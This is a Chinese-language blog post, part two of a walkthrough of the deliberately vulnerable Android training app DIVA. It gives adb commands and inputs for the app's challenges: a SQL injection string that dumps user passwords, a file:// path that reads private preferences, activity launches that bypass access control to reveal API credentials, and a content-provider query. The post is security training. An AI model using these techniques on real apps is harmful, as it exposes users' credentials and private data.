安全圈 | 专注于最新网络信息安全讯息新闻

首页

android app漏洞學習(二)

作者 rampino 时间 2020-03-01
all

接上一篇沒寫完的文章《Android App漏洞學習(一)》,下麵繼續剩下的幾個部分。

PART 7不安全的輸入1(sqli)

打開日誌:

adb logcat

輸入一個單引號,在日誌中可以看到報錯資訊,存在sql注入。

輸入' or '1'='1,可返回所有使用者密碼。

PART 8不安全的輸入2(讀取本地檔案)

可訪問本地的任意檔案,輸入

file:///data/data/jakhar.aseem.diva/shared_prefs/jakhar.aseem.diva_preferences.xml

PART 9 存取控制1(Activity 1)

查看AndroidManifest.xml檔案中暴露的activity組件:

利用am(Activity Manager tool)啟動暴露的組件,來繞過許可權控制:

adb shell am start jakhar.aseem.diva/.APICredsActivity

adb shell am start -n jakhar.aseem.diva/.APICredsActivity -a jakhar.aseem.diva.action.VIEW_CREDS

同時也可以使用drozer來完成:

PART 10 存取控制2(Activity 2)

輸入adb shell am start jakhar.aseem.diva/.APICreds2Activity,並沒有出現PART9中的情况,添加了驗證PIN碼。

PART 11 存取控制3(Content Providers)

查找暴露的Content Providers組件:

然後查找包含content://的smali檔案。

$ grep -lr“content://”*

查看私有日誌內容

$ adb shell content query–uri content://jakhar.aseem.diva.provider.notesprovider/notes

另一種管道:使用drozer:

總結

本文將上次未講完的內容大概提了一下,大家在學習測試的時候有任何問題都可以提出來,大家一起交流,為了更好的交流請大家加入學習群,向作者大膽提問,共同成長。